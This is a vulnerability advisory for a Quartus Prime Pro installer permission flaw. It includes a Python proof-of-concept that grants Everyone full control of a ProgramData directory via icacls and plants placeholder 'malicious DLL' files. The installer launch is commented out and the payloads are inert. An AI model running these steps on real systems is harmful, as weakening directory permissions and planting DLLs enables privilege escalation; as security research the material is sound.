Under certain circumstances, the Quartus Prime Pro Installer for Windows does not check the permissions of the Quartus target installation directory if the target installation directory already exists.
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Quartus Prime Pro < 23.4
Quartus Prime Pro < 24.1 (presumed fixed version)
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
# CVE-2025-13663 PoC - Quartus Prime Pro Installer Privilege Escalation
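# This PoC simulates the missing permission check in the Quartus Prime Pro Installer:
# it pre-creates the target directory with a permissive ACL and writes placeholder
# files into it; the actual installer launch is commented out.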
import os
import subprocess
import shutil
import ctypes
import sys
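def create_malicious_directory(target_path):
    """Pre-create the install directory and grant Everyone full control on it.

    This reproduces the precondition described for CVE-2025-13663: the
    target installation directory already exists, with a permissive ACL,
    before the installer runs. Per the advisory text, the installer does not
    check the permissions of a target directory that already exists.

    Args:
        target_path: Directory to create (if missing) and re-ACL.

    Raises:
        subprocess.CalledProcessError: If icacls exits with a non-zero status.
        OSError: If the directory cannot be created or icacls cannot be started.
    """
    # exist_ok replaces the separate exists() test, which left a window
    # between the check and the creation.
    os.makedirs(target_path, exist_ok=True)
    # Set Everyone full control on the directory
    # This simulates what an attacker can do as a low-privilege user
    # The command is passed as an argument list with no shell, so a path that
    # contains quotes or cmd.exe metacharacters is never parsed as a command.
    subprocess.run(
        ['icacls', target_path, '/grant', 'Everyone:F', '/T'],
        check=True,
    )
    # Defensive takeaway: an existing install directory whose ACL lets
    # non-administrators write is the condition to audit for (running icacls
    # on the directory lists its ACL) before running the installer elevated.
    print(f'[+] Created directory with Everyone full control: {target_path}')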
def prepare_exploit_payload(target_path):
    """Write an inert placeholder file named QuartusPrimeHook.dll.

    The file holds only the two-byte 'MZ' magic followed by 100 zero bytes;
    it carries no PE headers and no code. It stands in for a file that
    a low-privileged user could place in the directory before the install.
    The filename is the PoC author's choice; nothing on the page shows that a
    Quartus component loads a DLL of this name.

    Args:
        target_path: Directory in which the placeholder is created.

    Returns:
        The full path of the file that was written.
    """
    # In real attack, this would be a DLL with malicious code
    placeholder_bytes = b'MZ' + b'\x00' * 100
    dll_path = os.path.join(target_path, 'QuartusPrimeHook.dll')
    with open(dll_path, 'wb') as handle:
        handle.write(placeholder_bytes)
    print(f'[+] Prepared malicious DLL: {dll_path}')
    return dll_path
def trigger_installation(target_path):
    """Print the installer command line, or simulate an install if it is absent.

    The real installer is never started: the subprocess call is left
    commented out. When the installer executable is not found, ten stub files
    (component_0.dll .. component_9.dll, each 'MZ' plus 100 zero bytes) are
    written into target_path to stand in for installed files.

    Args:
        target_path: Directory passed as the install location.
    """
    # NOTE(review): the page lost its indentation; the simulation loop and the
    # closing message are read here as part of the "installer not found" path.
    quartus_installer = 'C:\\intelquartus\\quartus_pro_setup.exe'
    if not os.path.exists(quartus_installer):
        print(f'[-] Installer not found at: {quartus_installer}')
        print('[+] Simulating installation process...')
        # Simulate installation writing files to controlled directory
        stub = b'MZ' + b'\x00' * 100
        stub_paths = (
            os.path.join(target_path, f'component_{index}.dll')
            for index in range(10)
        )
        for fake_dll in stub_paths:
            with open(fake_dll, 'wb') as out:
                out.write(stub)
        print('[+] Installation completed - files written to controlled directory')
        return
    cmd = f'"{quartus_installer}" --install-dir="{target_path}"'
    print(f'[+] Triggering installation: {cmd}')
    # The launch stays disabled, as on the page:
    # subprocess.run(cmd, shell=True)
def main():
    """Run the three simulated stages against a fixed ProgramData directory.

    Stages, in order: pre-create the directory with a permissive ACL, write
    the placeholder DLL, then print or simulate the installation. The closing
    messages name the impact: installed files end up in a directory that
    non-administrators can modify.
    """
    target_path = 'C:\\ProgramData\\IntelQuartusPrime'
    stages = (
        create_malicious_directory,   # Step 1: Create directory with weak permissions
        prepare_exploit_payload,      # Step 2: Prepare payload
        trigger_installation,         # Step 3: Trigger vulnerable installation
    )
    closing_messages = (
        '[+] Attack chain completed',
        '[+] The installation process wrote files to a directory with weak permissions',
        '[+] Attacker can now modify installed files or plant persistence mechanisms',
    )

    print('=== CVE-2025-13663 Privilege Escalation PoC ===')
    print('[!] For authorized security testing only')
    for stage in stages:
        stage(target_path)
    for message in closing_messages:
        print(message)
# Run the simulation only when the file is executed as a script, not on import.
if __name__ == '__main__':
    main()